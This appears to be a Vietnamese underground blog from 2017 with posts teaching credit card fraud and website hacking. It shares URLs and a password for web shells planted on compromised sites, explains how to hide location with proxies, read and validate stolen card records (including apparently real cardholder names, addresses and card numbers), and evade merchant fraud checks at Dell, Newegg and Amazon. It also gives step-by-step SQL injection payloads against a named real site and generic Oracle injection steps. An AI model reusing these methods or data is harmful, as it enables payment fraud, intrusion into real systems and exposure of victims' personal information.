Thứ Bảy, 17 tháng 6, 2017

share Shell 1 số site thực tập

Shell

http://oknamastera.ru/wp-content/plu...tch/common.php


http://www.emilianobursese.com.ar/wp...links-opml.php


http://www.holdviola.hu/wp-llinks-opml.php


http://www.pinetreevilla.com/wp-llinks-opml.php


http://www.cityhotelbucuresti.ro/wp-llinks-opml.php


Pass: JIAWroewtn345AR45fd
Người đăng: vào lúc Không có nhận xét nào:
Nhãn:

[NEWBIE]Cơ bản về Shipping

[NEWBIE]Cơ bản về Shipping

Cơ bản về Shipping
________________________________________


Lời mở đầu
Các bài này được rút gọn tối đa, dùng từ ngữ cực kì gần gũi để cho newbabie có thể dễ dàng tiếp cận.

Bài học đầu tiên

Mục đích sử dụng credit card?

Trích:
1 - Shipping:
- Là hình thức mua hàng trên mạng bằng credit card, sau đó gửi về Việt Nam
- Nhắc tới ship, người ta thường nhắc tới Dropper:
Nước ngoài nó khinh VN mình đếch thèm giao dịch và chuyển hàng. Vì vậy chúng ta cần DROP (có nghĩa là 1 người sống ở nước ngoài nhận hàng giùm). Khi ship thì hàng được chuyển về địa chỉ của DROP, sau đó chúng ta ăn chia với DROP.

2 - Mua các tài sản ảo và bán lại cho những người có nhu cầu:
Tài sản ảo ở đây là server, host, domain, thẻ gọi điện thoại quốc tế, đồ chơi xịn của game online…

3 - Cashout
Muốn cashout thì nói chung phải có chút kiến thức về các hệ thống tiền tệ (để qua mặt nó), hoặc là học các kỹ thuật in thẻ ATM.

4 - Mua soft, mua tài khoản xxx, ebook …
Bài học số 2:

Các điều kiện cần và đủ trước khi sử dụng credit card (CC)?

1. Khái niệm:

- Bởi vì chủ thực sự của CC là người nước ngoài (USA, UK, CANADA,…) nên ko thể nào chúng ta ngồi ở VN mà sử dụng CC được.
- Mỗi máy tính khi truy cập vào internet đều được cấp cho 1 địa chỉ IP, nhớ địa chỉ IP mà người ta có thể dễ dàng biết được bạn ở đâu?

Đó là 2 lý do chúng ta phải FAKE IP, sau khi FAKE IP thì máy tính của bạn sẽ thông qua 1 địa chỉ IP ở USA, UK, … để truy cập vào internet.

2. Phân loại:

Để cho dễ hiệu, ta chia làm 2 loại:
+ Sock
+ Proxy
Các bạn cứ yên tâm, tự khắc khi sử dụng các bạn sẽ biết được cái nào là sock, cái nào la proxy. Đơn giản là vì khi tìm thấy chúng, ng ta đã ghi rõ sẵn là sock hay proxy
Nó sẽ có dạng như sau: 69.124.12.212:123 (69.124.12.212 là IP, 123 là PORT)

3. Kiểm tra Sock, Proxy còn sử dụng được hay không?
Có rất nhiều trang web giúp ta làm chuyện này, xin lấy VD 1 trang web khá tốt:
hxxp://www.checker.freeproxy.ru/checker/

5. Kiểm tra Sock, Proxy có phải là hàng tốt hay không?
hxxp://www.mxtoolbox.com/blacklists.aspx
Checking 67.185.248.54:1080 against 144 known blacklists…
Listed: 11 time(s)
Timeouts:5

Black List càng nhỏ thì có nghĩa là Sock, Proxy của chúng ta càng good. Trường hợp này blacklist của chúng ta là 11.

4. Cách FAKE IP:

+ Proxy:
- Tools –> Interner Opition –> Connections –> LAN Settings
- Check vào Use a proxy server…..
- Điền proxy vào như hình dưới

+ Sock:
- Tools –> Interner Opition –> Connections –> LAN Settings
- Check vào Use a proxy server…..
- Chọn Advanced
- Điền sock vào như hình dưới

Bài học số 3

Cách đọc và hiểu 1 Credit Card

Một Number Card thường gồm có 16 chữ số, có loại có 13 chữ số.

1. Phân loại:

Trong đó, 4 chữ số đầu tiên thường quy định và là dấu hiệu nhận dạng bởi các tên của ngân hàng phát hành Card đó

3xxx xxxx xxxx xxxx: Ameriacan Express Card
4xxx xxxx xxxx xxxx: Visa Card
5xxx xxxx xxxx xxxx: Master Card
6xxx xxxx xxxx xxxx: Discover Card

Đó là các ngân hàng phân loại. Còn chúng ta thì phân loại theo:

+ CC không có CVN (CVV): ko có “Card Verification Number”, ít nhưng vẫn xài được loại này, thường thì mua softwares…
+ CC có CVN (CVV): có Card Verification Number, có thể làm được rất nhiều chuyện như trong bài 1 đã liệt kê.
+ CC full info (có thêm login bank và Pin ATM): cái này dùng để cashout.

2. Cách đọc:

Thường CC sau khi hack từ Shop ra sẽ có dạng này:
13774/Carole/Kirner/8 Hunter Ct./Montgomery/IL/60538/US/kirner124@comcast.net/630-896-7525/13774/60538/Carole Kirner/2/549123701563xxxx /12/6/799/

Lần đầu khó phân biệt, riết sẽ quen thôi:
+ First Name: Carole
+ Last Name: Kirner
+ Address: 8 Hunter Ct.
+ City: Montgomery
+ State: IL
+ Zipcode: 60538
+ Phone: 630-896-7525
+ CC Number: 549123701563xxxx
+ CVV: 799
+ Date Exp:12/6

Bài học số 4

Cách check CC xem live hay die?

Áp dụng bài 2 để FAKE IP, hiểu được các thông số của CC ở bài 3, bây giờ các bạn phải biết cách kiểm tra xem CC đó còn dùng được nữa không. Có 2 phương pháp:

1. Đem đi dùng luôn, nếu CC live thì thành công luôn, còn nếu die thì bỏ, tìm CC khác, khỏi mắc công check đi check lại lôi thôi. Nhưng nhớ mỗi lần FAIL thì các bạn nên clear cookie rồi hãy thử lại bằng 1 con CC khác. Ko đâu check CC good bằng chỗ mình cần sử dụng CC.

2. Cẩn thận hơn, các bạn có thể check trước, rồi mới đi dùng. Mình khuyến khích dùng WALLET (đến giờ mình vẫn dùng WALLET).

Hướng dẫn check CVV ở WALLET !

Thấy nhiều anh em newbie gặp khó khăn trong việc check CVV và không bít check ở đâu cho cool , tôi khuyến khích anh em nen check Wallet , tuy hơi lâu 1 chút nhưng rất cool , wa được wallet thì đảm bảo anh em dùng con CVV đó làm gì cũng OK , kô paygate nào là không qua , ship hàng thoải mái. Sau đây xin hướng dẫn cụ thể . Hi vọng anh em check thành công .

********************************
Về cơ bản , anh em login vào wallet bình thường : xxx.wallet.yahoo.com , sau đó chọn Add new payment method và chuyển đến trang Add payment method .

Anh em cần điền info như sau :

* Cardtype : Amex, Visa ….

* Cardnumber : Paste CC number cần check vào

* Card Verification : Điền CVV2 number

* Expiration Date: Điền ngày hết hạn CC

* Name on Card: Điền full name của chủ thẻ

* Nickname: Cái này là mới , bắt buột phải điền , khuyến khích anh em sẵn tay paste name của chủ thẻ vào luôn rồi xóa bớt firstname hoặc lastnname là nhanh gọn nhất ( sau này có muốn bít con CC đó đã check chưa chỉ cần nhìn nickname là bít ) . Thật ra cái này điền gì cũng được nhưng nếu anh em điền không đúng thì lôi thôi , tôi thấy nhiều người bị dính ở chỗ này.

* Billing Address: Cái này anh em điền cái gì cũng được cứ gõ đại , chẳng hạn tôi gõ : 121321sasfasfs….

* City: Cũng như Billing Address , điền gì cũng được

* State: Chọn đúng state của CVV

* Zip/Postal Code: Điền đúng zip của state ở trên , cái này là quan trọng , nếu không đúng YH sẽ báo lỗi.

* Telephone Number: Cái này thì sẵn tay paste luôn cái số nó ví dụ ở dưới vào cho nhanh.

Sau đó anh em nhấn Continue , nếu nó báo như thế này thì OK , con đó live , vác đi chiến nhé

(McSloy là nickname mà tôi chọn , ở đây là lastname luôn).

Nếu bị như vậy thì con đó die , anh em đổi con khác làm lại như lúc đầu

Nhược điểm là nó chỉ cho add tối đa 10 con , nhưng không sao , anh em check xong live thì có thể del nó ra khỏi list để check tiếp.
Người đăng: vào lúc Không có nhận xét nào:
Nhãn:

Ebook+Video hướng dẫn hack SQL injection-OKE

Bạn mới bước chân vào giới UG ? Bạn muốn kiếm đc thật nhiều tiền (dù đấy là tiền phi pháp) ? Đầu tiên, bạn hãy dẹp cái suy nghĩ rằng, chỉ cần có được vài con CCV, CCN hay PP và đợi TUT làm theo là sẽ kiếm đc tiền 
Như bao ngành nghề khác, muốn làm ra được thành phẩm, bạn phải có KIẾN THỨC CĂN BẢN, lời khuyên của tôi dành cho những newbie rằng, hãy tự tìm và đọc những ebook về hacking, và thực hành ở những shop test của những pro share 

Công cụ kiến thức : http://www.mediafire.com/download/vu...-+Headshot.chm : Ebook SQL Injection của Headshot mình sưu tầm được.
Sau khi ngâm xong ebook này, một số bạn sẽ có thắc mắc rằng, nên bắt đầu "HACK" như thế nào ? Lời khuyên của mình là, hãy tập hack bằng tay, không sử dụng tool trước, điều này sẽ mang lại cho bạn những lưu ý cần ghi nhớ, nếu bạn hack bằng tay 1 cách thành thạo, thì dùng tool chỉ nâng tốc độ của bạn lên, chứ k có tool vạn năng nào bạn chỉ cần ném đại 1 link vào là CC,PP tự về tay bạn.

Mình sưu tầm thêm được 1 VID hướng dẫn SQL Injection cơ bản : http://www.youtube.com/watch?v=oeq929HEUtQ

Mình mong rằng, sau khi đọc được TUT đơn giản này, các newbie có hứng thú về hacking, và chúc các bạn có thể tiếp thu được những tinh hoa trong ebook và tiến sâu vào thế giới UG đầy cạm bẫy 

Mình là 1 Coder, cũng vừa bước chân vào thế giới UG, viết TUT này chỉ chia sẽ kinh nghiệm của những ngày đầu tiên mình tìm hiểu về UG, mong các pro k vào chém :d
Người đăng: vào lúc Không có nhận xét nào:
Nhãn:

Thứ Năm, 15 tháng 6, 2017

[NEWBIE]Tìm hiểu về thẻ tín dụng (credit card,cc)

[NEWBIE]Tìm hiểu về thẻ tín dụng (credit card,cc)

Tìm hiểu về thẻ tín dụng (credit card,cc)
________________________________________
Credit Cards hay các thẻ tín dụng đối với đa số người Việt tại hải ngoại không có gì là mới mẻ, đã có nhiều bài viết về vấn đề này rồi nên cũng chỉ lập lại và thêm chút xíu thôi. Mình thấy nguồn lợi tức chính của các ngân hàng không phải là cho các công ty lớn vay muợn hàng trăm triệu dollars để thu lời mà do tiền lời và lệ phí thu được từ các thẻ tín dụng . Nói ra chắc các bạn không tin, nhiều khi ngân hàng thu lời đuợc 100% từ tiền cho vay ở thẻ tín dụng . Ví dụ ngân hàng A cấp cho anh B một thẻ tín dụng với credit line là $500.00 USD và annual fee là $79.00 USD một năm tiền lời là 19.9%/năm nếu anh B xài quá credit line của mình thì tiền lời sẽ là 26.5%/năm và mỗi lần vuợt qua giới hạn ( over limit fee ) sẽ bị phạt $39.00/lần, anh B này trả trễ cũng bị phạt $39.00 USD/lần . Các bạn thử cộng lại sẽ thấy anh B này đã tốn bao nhiêu tiền cho ngân hàng

- Việt Nam trong tưong lai thẻ tín dụng cũng sẽ đưọc phổ biến rộng rãi đến mọi tầng lớp xã hội, vì vậy chúng ta cũng nên tìm hiểu thêm về vấn đề này . Vivi sẽ tham khảo từng bước với các bạn về thẻ tín dụng:
Trong một giao dịch bán lẻ truyền thống các vạch từ được đọc bởi thiết bị đầu cuối của điểm mua bán . Mã số kiểm tra giá trị sử dụng của Visa card ( CVV ) hay Mastercard ( CVC ) được mã hoá trong các vạch này có thể được người phát hành thẻ kiểm tra trong thời gian còn hiệu lực sử dụng . Tuy nhiên nếu thẻ không còn giá trị sử dụng thì thẻ CVV hay thẻ CVC không còn hợp lệ nữa . Để giảm hiện tượng lừa đảo trong môi trường sử dụng card không hiện hữu ( card ảo ) những người mua hàng ,nhà buôn và người dùng thẻ sử dụng cvv2 hay cvc2 :

- Vậy Cvv2 Hay Cvc 2 Là Gì :

cvv2 hay cvc2 là mã số bảo mật gồm bộ ba kí tự số được in ở mặt sau card , những số này xuất hiện ở dạng nghiêng ngược ở ngay đầu khung chữ kí và ở cuối ( xem mã u ) . Chương trình này giúp hiệu lực hoá một thẻ đang sử dụng trong giao dịch . Tất cả các thẻ Mastercard , cả thẻ tín dụng lẫn thẻ nợ , được cc yêu cầu là phải có chữ a CVC2 trước ngày 1/1/97 còn tất cả các thẻ VISA phải là 1/1/1001

- CVV2 Hay CVC2 Hoạt Động Như Thế Nào :

Các nhà buôn thẻ ảo được hướng dẫn rằng phải yêu cầu người giữ thẻ xuất trình cvv2 /cvc2 khi người giữ thẻ đặt hàng . Nhà buôn yêu cầu người giữ thẻ đọc mã số này từ thẻ . Sau đó nhà buôn yêu cầu kiểm tra cvv2/cvc2 trong quá trình được sử dụng . Người phát hành thẻ xác định tính hợp lệ của cvv2 hay cvc2 và truyền đi kết quả từ chối hay chấp nhận trong quá trình được quyền sử dụng . Nhà buôn bằng cách sử dụng cvv2/cvc2 cùng với dịch vụ kiểm tra địa chỉ ( AVS) và những phút bàn về quyền sử dụng sau đó có thể thực hiện các quyết Ċ ?ịnh có nhiều thông tin hơn đối với việc chập thuận việc giao dịch đó hay không . . Ngoài ra khi sử dụng cvv2/cvc2 các nhà buôn có thể hi vọng giảm được chi phí trả lại ( chargeback) ít nhất là 26%

-Thay đổi đối với khung chữ kí

Trước đây các số cvv2 hay cvc2 đi theo sau số tài khoản 16 số in ở khung chữ kí của thẻ . Số tài khoản 16 số bây giờ đã bị cắt ngắn còn 4 số trên khung chữ kí . Sự thay đổi này giúp người sử dụng thẻ ký thẻ của họ dễ dàng hơn . Nó cũng giúp nhà buôn dễ dàng hơn khi so sánh chữ kí trên thẻ và chữ kí trên phiếu bán hàng . 19 chữ số ( 16 + 3 ) không còn gây cản trở trong việc kiểm tra chữ kí nữa

- Mã Số Kết Quả Là Gì :

+ Định nghĩa :

M : cvv2 khớp nói chung là bạn muốn thúc đẩy các giao dịch mà bạn đã nhận được chứng nhận thẩm quyền sử dụng ( một cvv2 khớp và một thẻ kiểm tra địa chỉ khớp nếu cần )

N : Cvv2 không khớp có lẽ bạn phải tiếp tục làm việc với người sử dụng thẻ trước khi thực hiện giao dich ngay cả khi bạn đã nhận được một chút chứng nhận thẩm quyền sử dụng . Nếu bạn đã nhận được một chút chứng nhận thẩm quyền sử dụng nhưng bạn nghĩ rằng một giá trị cvv2 không có lẽ đã được gửi đi trước bạn có thể gửi trả lại cvv2 nhưng phải chắc chắn rằng đã sử dụng số tiền $ là 0 cho giao dịch đó để đường tín dụng của khách hàng không bị ảnh hưởng bởi một cvv2 thứ 2 nữa

P : Yêu cầu cvv2 không được thực hiện hoặc ngày hết hạn không được cung cấp , hoặc card không có giá trị cvv2 . Nếu ngày hết hạn để trống hãy nộp lại như là số tiền $ = 0 cho giao dịch đó để đường tín dụng của khách hàng không bị ảnh hưởng bởi một cvv2 thứ 2 nữa

S: Cvv2 có trên card nhưng nhà buôn gửi một mã số nói rằng không có cvv2 . Có lẽ bạn phải làm việc lại tiếp tục với khách hàng để kiểm tra lại rằng khách hàng đã kiểm tra vị trí chính xác đối với số cvv2

U: Người phát hàng không ủng hộ Cvv2

Link Address Verification Service ( AVS )

Atlantic Payment - Dịch vụ kiểm tra địa chỉ : Nếu bạn là nhà buôn dùng thẻ tín dụng , bạn có thể so sánh địa chỉ chi trả của khách hàng USA tại ngân hàng phát hành trước khi hoàn thành một giao dịch mà vạch từ không thể đọc đuợc . Quá trình kiểm tra này yêu cầu cần thiết nếu bạn là nhà buôn dùng thư tín , internet , thư tín hay điện thoại ...

Khi yêu cầu kiểm tra tín dụng thông thường hay uỷ quyền sử dụng bạn phải nhập thông tin địa chỉ chi trả do người sử dụng card cung cấp , khi hệ thống máy tính tiếp xúc với người phát hành và yêu cầu chứng nhận tín dụng , thì thông tin địa chỉ được so sánh vói thông tin trên hồ sơ tại nơi người phát hành . Người phát hành sẽ gửi một mã số phúc đáp với một phúc đáp về thẩm quyền sử dụng tín dụng . Bạn sẽ thực hiện các quyết định kinh doanh sử dụng sau khi xử lý các phúc đáp khác nhau . Tuy nhiên bạn phải luôn nhớ rằng khi một khách hàng cáo buộc rằng họ không hề gửi một đơn đặt hàng bằng mail , điện thoại hay inernet với bạn thì AVS " khớp chính xác " X"hay " Y " sẽ giúp bạn bác bỏ cáo buỊ ?c đó . Và hãy nhớ rằng rất nhiều thiết bị xử lý () sẽ không xử lý các giao dịch mua bán với mã số phúc đáp " N" . Hãy tiến hành một cách thận trọng
Có rất nhiều bạn khi nhìn thấy CC được post lên lại hỏi những câu đại loại như :

- Cái đống trên đây là gì thế , sử dụng như thế nào ?

- Cái Name on Card đâu ... Address ở chỗ nào ?

THÔNG TIN VỀ CARD

Một cái CC hợp lệ phải bao gồm đầy đủ các yếu tố sau :

+ Name on Card hay Card holder : Họ tên chủ thẻ .

+ Billing or Mailing Address : Địa chỉ .

+ City : Thành phố .

+ State : Bang ( của Mẽo và Canada ) .

+ Zip COde ( Post code ) : Mã vùng .

+ Card number : Số thẻ .

+ Card Exp date : ngày hết hạn của thẻ .
và có thể có vài thành phần khác như :

+ Phone number : Số phone ( 11 số ) .

+ Fax Number : Số Fax ( 11 số ) .
hay nhất là khi CC của bạn có cái này :

+CVV2 hay CVN : cái này là mã số bảo mật in trên CC .

KINH NGHIỆM :

Không có gì hơn là phải dùng nhiều , nhìn nhiều rồi sẽ quen thôi

-----Sẽ dễ dàng hơn nếu bạn có một vốn tiếng Anh kha khá-----

+ Một đống như sau :

VISA Brett Crow 4300230019306705 11/03 Brett Crow 7 Spruce Street Esko, Minnesota 55733 (XXX)-XXX-XXXX XXX

- Các bạn nhìn cái nào có vẻ là tên người thì nó là Name đấy ( Đừng có cười ! Sự thật đấy ) . Thông thường thì name nằm ở đầu hoặc ngay sau cái Exp date . Như ở đây nó là Brett Crow .

- VISA là nói đây là một cái VISA .

- Một chuỗi 16 con số bắt đầu = 3,4,5 hoặc 6 tùy loại card là CC number . ở đây là 4300230019306705

- Một cụm có cấu tạo theo dạng : AB/CD hay 4 số liên tiếp ABCD là Exp date . thường Exp nằm ở ngay sau CC Number . Ở đây là 11/03 Tức là tháng 11 năm 2003 .

- Sau tên hoặc Exp date sẽ là Address ! Có cấu trúc dạng : [Số] [ Chữ ] ...... thường hay kết thúc = street, driver, Dr, .... thường thôi nhé chứ không phải là tất cả đâu . Đặc biệt có một số địa chỉ có dạng P.O Box [........] đây là hộp thư lưu trú đăng ký ở bưu điện ! Ở đây address là : 7 Spruce Street .

- Zipcode ( Post code ) : Một chuỗi có 5 số ( Mẽo Only ) nhưng nhiều khi lại có ngoại lệ . ở đây zip là 55733 .

- State : Có thể Viết tắt ( 2 chữ cái viết hoa ) hoặc viết full . Dùng nhiều sẽ thuộc State ( Bọn mẽo có bao nhiu bang ý, quên mất roài ) . State thường đứng ngay sau City và đứng ngay trước Zip ! Ở dống này là Minnesota .

- City : không có gì đặc biệt ngoài việc nó đứng sau Address và trước state .

- Phone : Một dãy 11 số có cấu trúc dạng : (XXX)-XXX-XXXX hay XXX-XXXXXXX ...... XXXXXXXXXX . Phone thường đứng sau Zip. Nếu liền cạnh Phone có một dãy cấu trúc tương tự thì đó là số Fax .

- Đống này không có Phone nhưng bạn có thể tìm thấy Phone = 1 cách rất đơn giản : sang một search engine (máy tìm kiếm ) bất kỳ ví dụ như là http://www.google.com/ hay http://www.av.com/ nhập Zip của bạn vào trường search rồi tìm ! Kết quả sẽ là rất nhiều địa chỉ trong đó có số phone thuộc thành phố có Zip code giống bạn ! ! Dễ dàng thế thôi !

- CVV2 : Nếu CC Number của bạn có đầu 4 hay 5 thì CVV sẽ có 3 số . Còn nếu đầu 3 hay 6 thì sẽ có 4 số ! CVV2 nằm ở cuối cùng của đống . ! Ở đây không có Cvv2 thực mình dùng tạm XXX !
1- Thẻ tín dụng là gì ?

2- Có bao nhiêu loại thẻ tín dụng ?

3- Ai có thể xin thẻ tín dụng và làm sao để xin ?

4- Xin thì dễ mà giữ cho tốt mới là khó !

5- Trả không nổi nợ thẻ tín dụng thì sao ?

6- Làm sao để làm tốt lại tín dụng xấu ?

7- Những điều nên biết về credit score

8- Thẻ tín dụng manh laị những lơị ích gì ?
Người đăng: vào lúc Không có nhận xét nào:
Nhãn:

[SQL]Tut Hackshop Php - 1

[SQL]Tut Hackshop Php - 1

+thứ 1:
SQL injection thì phân biệt mysql injection và mssql injection là chính
còn php và asp chỉ là vấn đề phụ(gần như giống nhau)...1 số bạn lại nhầm tưởng
+thứ 2:
UNION dùng để kết nối 2 mệnh đề SELECT có hỗ trợ cả mysql và mssql nên có thể xài ở mọi trường hợp
+thứ 3:
mysql kết hợp tốt với php nên thông thường các bạn hack site php chỉ gặp mysql...nhưng ko tuyệt đối là thế mà có thể là mssql,oracle....
+thứ 4:nói thêm (có sai thì mấy pro góp ý)
VD:id=1 các bạn sửa lại thành id=-999 or id=null làm gì?
để mệnh đề SELECT thứ nhất ko trả về kết quả
giả sử trên 1 page có 3 chỗ echo ra kết quả mà SELECT thứ nhất trả về 3 kết quả thì hết chỗ...SELECT thứ 2 tuy trả về kết quả nhưng ko có chỗ echo ra
+thứ 5:
cấu trúc UNION:
Code:

SELECT id,user,pass,level from test UNION SELECT 1,'a','b',2 from example

VD trên nghĩa là type các column trong 2 mệnh đề SELECT phải giống nhau

Áp dụng:
Code:

http://www.peric.ac.cn/product.php?product_id=2'

Code:

mssql_query

=> nghĩa là nó sử dụng sql server or mssql
attack = UNION nha
đầu tiên đếm column đc 4 column
Code:

http://www.peric.ac.cn/product.php?product_id=-2 union select 1,2,3,4 from information_schema.tables--

type khác nhau
Code:

http://www.peric.ac.cn/product.php?product_id=-2 union select null,null,null,null from information_schema.tables--

null ko có type nên bypass tốt
Code:

Warning: mssql_query(): message: The text, ntext, or image data type cannot be selected as DISTINCT. (severity 16) in /home/www/peric/product.php on line 262

DISTINCT là gì thì các bạn tự tìm hĩu (đơn giản là lọc kết quả trùng nhau)
để khắc phục thì xài union all select
kế típ dò type từng column
Code:

http://www.peric.ac.cn/product.php?p...chema.tables--

vẫn bt =>column type int(thường là ID mà )
Code:

http://www.peric.ac.cn/product.php?p...chema.tables--

ra số 2 đẹp đẹp
Code:

http://www.peric.ac.cn/product.php?p...chema.tables--

báo lỗi nên change thành '3','a',.. gì đó miễn là type char
Code:

http://www.peric.ac.cn/product.php?p...chema.tables--

Code:

Warning: mssql_query(): message: Line 1: Incorrect syntax near '\'. (severity 15) in /home/www/peric/product.php on line 262

=> hình như bị magic quote(là gì thì tìm hĩu )
=>chuyển thành
Code:

http://www.peric.ac.cn/product.php?p...chema.tables--

tương tự
Code:

http://www.peric.ac.cn/product.php?p...chema.tables--

---hết---
Người đăng: vào lúc Không có nhận xét nào:
Nhãn:

[NEWBIE] Share cách nghiên cứu ăn các site lớn, cách test shop...

[NEWBIE] Share cách nghiên cứu ăn các site lớn.. hơn tut đó

Mình chỉ ăn các shop lớn vì shop lớn nó check = máy..nên ped sẽ dễ hơn và ăn shop lớn thì ăn mãi mãi

Mình ăn dell newegg cũng như amz gần 1 năm nay với 1 tut cơ bản : làm theo người khách hàng chân chính

Đối với các shop nhỏ.. đa số là người check order nên nếu bill # ship là nó sẽ yêu cầu verify = phone.. chắc các bác ship nhiều nên biết

Cách ăn shop nhỏ : Mún ăn shop nhỏ ( tức ăn sll ) thì đầu tiền các bác xem paygate của nó ntn..của bọn nào.. tốt nhất tránh xa mấy cái của bọn yahoo

Test thì cứ táng bill = ship hàng nhỏ trước.. và tránh những bin của bank lớn.. vì bank lớn đều check đc hết

TÌm nhưng con bin gold của nhưng bank nhỏ tầm rank > 200K


Ko các bác có thể táng kiểu bill = ship.. sau đó call cho shop. yêu cầu change add.. cái này dùng chưong trình fake sô đt.. sài đúng cái số mà mình mang đi ordder ped 100% lun

Đối với ăn các shop lớn ( cái này hơi khó ) vì shop lớn đầu tiên có chế độ blaclist ( trừ amazon ra )

Các shop lớn đa số chúng ta ped đêù hên xui mà nên : có khi táng 200$ ko ped.. nhưng hôm ăn đc 2k$ ( tất cả có lý do hết )

Thứ nhất với các shop như dell , newegg nó có chế độ check thông qua times out :tức là thời gian tốc độ load site của sock.. mình ship thì ko sài sock bao h cả .. vì sock thường hay baclklist ( sock là quan trọng nhất của ship)

Ví du : có mỗi trang 5sock.net.. 1 ngày có tầm 1k thằng đâm thì sock trùng nhau là chuyện bt và như thế là led

Thứ 2 : các shop lớn trừ amz ra thì nó thường check thông qua hệ số trung bình của 1 user thành công order,.. tức ví dụ : 100 người mua hàng thành công.. thời gian lưu trú của họ trong site là bao nhiêu.. nó lấy đó chia cho 100 thì ra hệ số trùng bình... mún test cái này thì bạn hãy làm 1 add clear.. xong ped hàng nhỏ.. làm với tốc đọ nhanh,, chậm ,, hoặc từ từ sẽ rõ
Tức là làm 1 user mua hàng thực sực

Thứ 3 : Nhiều ngừoi nghĩ Bin là ped.. ko hẳn.. đối với các shop lớn trừ những bin bill = ship thì ped ngon nhưng đa số h các shop lớn check đc hết AVS nên h ít có chuyện bill = ship

Bin thực sự ko quan trọng như nhiều người nghĩ ( mình toàn chọn hàng theo kiểu add ,, tức nhìn add của cvv để đoán số tiền ) đơn giản ví dụ debit classi nhưng nó ở Hàng Bông sẽ giàu hơn a gold ở Mù Căng chải rồi... và chọn theo city..state nữa

mình ko bao h ship theo bin ( vì bin tốn $ mua cvv ) mà shop lớn bin ko quan trọng.. vì : khách mua hàng thực sự họ có cần mua bin để ped ko ( ko ) họ ko cần tut này tut nọ để ped ..mà cứ vác cvv vào.. đâm là thủng và nhận hàng --

Thứ 4 : Các cậu cứ vào order từ từ nhẹ nhàng ngó nghiêng sản phẩm ...tìm ra hệ số trung bình của từng site.. ví dụ như dell ... thời gian trung bình của 1 khách hàng là tầm 8' ..các cậu orrder xong 1 phát trừ thời gian load sock..tầm 8' là qua đc 1 phần check của shop rồi

Hết..

-------------------------------------------------------------


Tut amz :

Có nhiều cách để chúng ta ped ở amz

Cách 1 : sài sock : sài ccn mail pass check trong mail xem có thì vào táng bill # ship

Nhưng khi add 1 add mới thì hãy add xong để đó trong 1 day.. để nó verifi add xong thì hãy ship nhá..

Cách này thì hơi mệt vì check MP lại còn check acc

Đôi với mình cứ sài ccn mà táng thẳng thôi

Cách 2 : Cách này khá cũ : sài ccn inter trừ CA với UK táng bill = ship

Cách 3 : Cách này khá hay

Thứ nhất : đối với amz việc fix item.. có khi ta táng về chủ thẻ cũng ko ped vì đợt đó.. số lượng order item đó vựot qua mức bình thừong khi đó amz nó sẽ hold tất cả các order về item đó lại và sẽ nghiên cứu lại vì sao tăng đột ngột số lượng order và như thế chúng ta led.. tất nhiên điều đó chỉ áp dụng 1 thòiư gian nhỏ nên có khi tut amz chúng ta ăn đi ăn lại 1 tut mãi mãi vấn đề trong 1 khoảng thời gian nhất định ( N900 N97 là hay bị thê hay laptop vì dân UG hay đâm mà )

Thứ 2 : Khi chung ta tạo 1 acc new : chúng ta ship 1 item nhỏ tầm quyển sách ( vấn đề sock quan trọng phải live lâu tầm ít 1 tiếng'.. để check status ) đối với quyển sách tầm 5' là shipping soon... sau đó khi đã shipping soon chúng ta táng order cần làm ( vì order item xịn nên tầm 30'- 1h mới có kết quả ) ( cách này hiện tại châph chờn phát đc phát ko )

Hoặc chúng ta có thể ccn die để ship

100% info là của con ccn live... ship item phụ kiện của item cần ship ví dụ cái cặp laptop chẳng hạn ... khi đó tầm 10' sẽ có mail báo về mail yêu cầu change cnn

Chúng ta sẽ vào táng item cần ship kèm phụ kiện và add vao đó con ccn live.. khi đó sẽ shipping son ( phập phù vì đợt này amz đã có bão liên tục fix order )

Lưu ý.. đối với amz có khi item 200$ 5' shipping soon ngay nhưng có item tầm 40$ ko bao h ped vì đó là item dính blacklist (nên việc lựa chọn item nào chúng ta cần shipp khá quan trong) amz cũng co 1 ngày shipping thoải mái ( ngày hoàng đạo ) vì trong ngày đó là ngày mà số lượng item đó có số lưôọg order cao nên chúng ta táng sẽ dễ ped hơn ( ngày đó các bạn tự ngâm cứu )

Cách 4 : Sài gift card : việc reg 1 gift card tầm 40$ khá đơn giản.. đùa tiên chúng ta sẽ reg tầm 10 acc gift card tầm 40$ là đc 400$ add vào 1 acc amz..
Tất nhiên acc amz đó sài sock mà khi sử dụng đến khi ship vẫN là 1 đầu sock ( sài ssh ) nhưng số lượng ssh và VPS có hạn.. nên vẫn khó ped

vấn đề amz nó có check máy.. tức là máy chúng ta có những cái như : IP mAc, Hdd , key win ,private computer.. mún ped nhiều và đều tay thì chúng ta phải change những cái này
nó kiểu check giống skype


==============----------===============
Tác giả: beautifull_life - VHC
Người đăng: vào lúc Không có nhận xét nào:
Nhãn:

Thứ Năm, 8 tháng 6, 2017

Trang Tập Luyện SQLi

Trang Tập Luyện SQLi

Link: http://leettime.net/sqlninja.com/
Người đăng: vào lúc Không có nhận xét nào:
Nhãn:

Thứ Tư, 7 tháng 6, 2017

khai thác lỗi ODBC -"Union Based Oracle Injection"

So far we learnt to inject into MySQL and the basics of SQL injection testing and finding the point of injection in other tutorials. In this tutorial we will learn how to inject into orable based website.

Finding the point of injection and making the union select statement is same in Oracle and other injection so we will continue with the rest part, if you have not read all the Basic Tutorial and other before this one...then i suggest you to read them to understand this one.

Some of the common error which can help you differentiate between ORACLE db and other is

Microsoft OLE DB Provider for ODBC Drivers error '80004005'

Microsoft VBScript runtime error '800a01a8'


So lets start and find out the number of columns using "order by" clause. 
www.vuln-web.com/photo.php?id=1' order by 1--
Workingwww.vuln-web.com/photo.php?id=1-' order by 10--

www.vuln-web.com/photo.php?id=1' order by 7--
Working
www.vuln-web.com/photo.php?id=1' order by 9--
Working

So as of now we know that 9 is the last column which worked, let us prepare the union select statement
www.vuln-web.com/photo.php?id=1' union select 1,2,3,4,5,6,7,8,9--
Error : FROM keyword not found where expected


www.vuln-web.com/photo.php?id=1' union select 1,2,3,4,5,6,7,8,9 from dual--
Error : expression must have same datatype as corresponding expression


www.vuln-web.com/photo.php?id=1' union select null,null,null,null,null,null,null,null,null from dual--
Working fine


Unlike MySQL Oracle do not allow select statement without from clause. As we have prepared the Union select statement our next task is to check which column is getting printed that we can do by random testing each column one by one by printing the current database name
www.vuln-web.com/photo.php?id=1' union select '1111',null,null,null,null,null,null,null,null from dual--
Error


www.vuln-web.com/photo.php?id=1' union select null,'2222',null,null,null,null,null,null,null from dual--
2222 gets Printed


This means we can use the second column from now. Now to get the Database name we can use:
(select ora_database_name from dual)
(select sys.database_name from dual)
(select global_name from global_name)
